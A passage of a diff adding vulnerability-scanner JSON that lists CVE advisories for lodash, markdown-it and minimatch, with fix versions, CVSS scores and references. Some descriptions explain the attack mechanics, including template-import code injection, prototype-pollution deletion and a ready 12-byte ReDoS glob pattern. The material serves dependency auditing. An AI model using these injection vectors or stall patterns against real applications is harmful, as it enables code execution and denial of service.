"pkg:npm/lodash@4.17.21", + "UID": "3422108e237b34df" + }, + "InstalledVersion": "4.17.21", + "FixedVersion": "4.18.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4800", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:28a01d75498ecfd8c501dddc65de6f1dc7ac7b66375f98ae8fdbb5e3665d5323", + "Title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports", + "Description": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-94" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 4, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 8.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 9.8 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 8.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-4800", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", + "https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc", + "https://nvd.nist.gov/vuln/detail/CVE-2026-4800", + "https://www.cve.org/CVERecord?id=CVE-2026-4800" + ], + "PublishedDate": "2026-03-31T20:16:29.66Z", + "LastModifiedDate": "2026-04-07T15:43:13.197Z" + }, + { + "VulnerabilityID": "CVE-2025-13465", + "VendorIDs": [ + "GHSA-xxjr-mmjv-4gpg" + ], + "PkgID": "lodash@4.17.21", + "PkgName": "lodash", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@4.17.21", + "UID": "3422108e237b34df" + }, + "InstalledVersion": "4.17.21", + "FixedVersion": "4.17.23", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13465", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2187f9c4938d0786655e9f0b24570e025c8f8cd37c66c7c0457566e3d986ab80", + "Title": "lodash: prototype pollution in _.unset and _.omit functions", + "Description": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 2, + "nvd": 2, + "oracle-oval": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:P", + "V3Score": 6.5, + "V40Score": 6.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:2452", + "https://access.redhat.com/security/cve/CVE-2025-13465", + "https://bugzilla.redhat.com/2431740", + "https://errata.almalinux.org/9/ALSA-2026-2452.html", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81", + "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", + "https://linux.oracle.com/cve/CVE-2025-13465.html", + "https://linux.oracle.com/errata/ELSA-2026-2452.html", + "https://nvd.nist.gov/vuln/detail/CVE-2025-13465", + "https://www.cve.org/CVERecord?id=CVE-2025-13465" + ], + "PublishedDate": "2026-01-21T20:16:05.25Z", + "LastModifiedDate": "2026-02-17T17:10:07.52Z" + }, + { + "VulnerabilityID": "CVE-2026-2950", + "VendorIDs": [ + "GHSA-f23m-r3pf-42rh" + ], + "PkgID": "lodash@4.17.21", + "PkgName": "lodash", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@4.17.21", + "UID": "3422108e237b34df" + }, + "InstalledVersion": "4.17.21", + "FixedVersion": "4.18.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:18611fb7f59f72fee5e79ecdce56d788b84e562c233363b40a4be1f4960b1e5b", + "Title": "lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass", + "Description": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-2950", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh", + "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", + "https://nvd.nist.gov/vuln/detail/CVE-2026-2950", + "https://www.cve.org/CVERecord?id=CVE-2026-2950" + ], + "PublishedDate": "2026-03-31T20:16:26.207Z", + "LastModifiedDate": "2026-04-07T16:12:25.97Z" + }, + { + "VulnerabilityID": "CVE-2022-21670", + "VendorIDs": [ + "GHSA-6vfc-qv3f-vr6c" + ], + "PkgID": "markdown-it@10.0.0", + "PkgName": "markdown-it", + "PkgIdentifier": { + "PURL": "pkg:npm/markdown-it@10.0.0", + "UID": "b068d65a3a75e116" + }, + "InstalledVersion": "10.0.0", + "FixedVersion": "12.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-21670", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f9b729292fba398ae05b02be8b1dbea418c121d1a9d9564c7a9798ca3b1e121b", + "Title": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patt ...", + "Description": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400", + "CWE-1333" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V2Score": 5, + "V3Score": 5.3 + } + }, + "References": [ + "https://github.com/markdown-it/markdown-it", + "https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101", + "https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c", + "https://nvd.nist.gov/vuln/detail/CVE-2022-21670" + ], + "PublishedDate": "2022-01-10T21:15:07.967Z", + "LastModifiedDate": "2024-11-21T06:45:11.87Z" + }, + { + "VulnerabilityID": "CVE-2026-26996", + "VendorIDs": [ + "GHSA-3ppc-4f35-3m26" + ], + "PkgID": "minimatch@10.0.3", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "97121a07d790c0d3" + }, + "InstalledVersion": "10.0.3", + "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:c835fee8458082cd20cc6e35fdc6917199d56beaf638b5836657726c28a21414", + "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-26996", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", + "https://linux.oracle.com/cve/CVE-2026-26996.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", + "https://www.cve.org/CVERecord?id=CVE-2026-26996" + ], + "PublishedDate": "2026-02-20T03:16:01.62Z", + "LastModifiedDate": "2026-03-06T21:32:10.65Z" + }, + { + "VulnerabilityID": "CVE-2026-27903", + "VendorIDs": [ + "GHSA-7r86-cg39-jmmj" + ], + "PkgID": "minimatch@10.0.3", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "97121a07d790c0d3" + }, + "InstalledVersion": "10.0.3", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8ff37ed564270d5d2a35539fcb03b21e3c99cfa7a1f18b640e501f66ade2e477", + "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-407" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27903", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", + "https://www.cve.org/CVERecord?id=CVE-2026-27903" + ], + "PublishedDate": "2026-02-26T02:16:21.353Z", + "LastModifiedDate": "2026-02-27T17:21:22.37Z" + }, + { + "VulnerabilityID": "CVE-2026-27904", + "VendorIDs": [ + "GHSA-23c5-xmqv-rm74" + ], + "PkgID": "minimatch@10.0.3", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "97121a07d790c0d3" + }, + "InstalledVersion": "10.0.3", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7e1f20b791b4869d401ef697e671c11a3b7fe37d7cbb34b7e25e6e63a77329b9", + "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-27904", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", + "https://linux.oracle.com/cve/CVE-2026-27904.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", + "https://www.cve.org/CVERecord?id=CVE-2026-27904" + ], + "PublishedDate": "2026-02-26T02:16:21.76Z", + "LastModifiedDate": "2026-02-27T17:16:23.773Z" + }, + { + "VulnerabilityID": "CVE-2026-26996", + "VendorIDs": [ + "GHSA-3ppc-4f35-3m26" + ], + "PkgID": "minimatch@3.1.2", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "69ef7485f56c11bb" + }, + "InstalledVersion": "3.1.2", + "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:12c7fff6e4b919c621256ada068e0a16d286f1bab7f66f3a1641d20416fcf742", + "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-26996", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", + "https://linux.oracle.com/cve/CVE-2026-26996.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", + "https://www.cve.org/CVERecord?id=CVE-2026-26996" + ], + "PublishedDate": "2026-02-20T03:16:01.62Z", + "LastModifiedDate": "2026-03-06T21:32:10.65Z" + }, + { + "VulnerabilityID": "CVE-2026-27903", + "VendorIDs": [ + "GHSA-7r86-cg39-jmmj" + ], + "PkgID": "minimatch@3.1.2", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "69ef7485f56c11bb" + }, + "InstalledVersion": "3.1.2", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2708c5f00b6ff51c4e9bbd3f0d02787b8b1e1ec513ead827165ebe48912083c6", + "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-407" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27903", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", + "https://www.cve.org/CVERecord?id=CVE-2026-27903" + ], + "PublishedDate": "2026-02-26T02:16:21.353Z", + "LastModifiedDate": "2026-02-27T17:21:22.37Z" + }, + { + "VulnerabilityID": "CVE-2026-27904", + "VendorIDs": [ + "GHSA-23c5-xmqv-rm74" + ], + "PkgID": "minimatch@3.1.2", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "69ef7485f56c11bb" + }, + "InstalledVersion": "3.1.2", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:cd84d9a381a9adf329b8de9e8aedff262d38728ffe446f659f168484982dc5bd", + "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-27904", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + 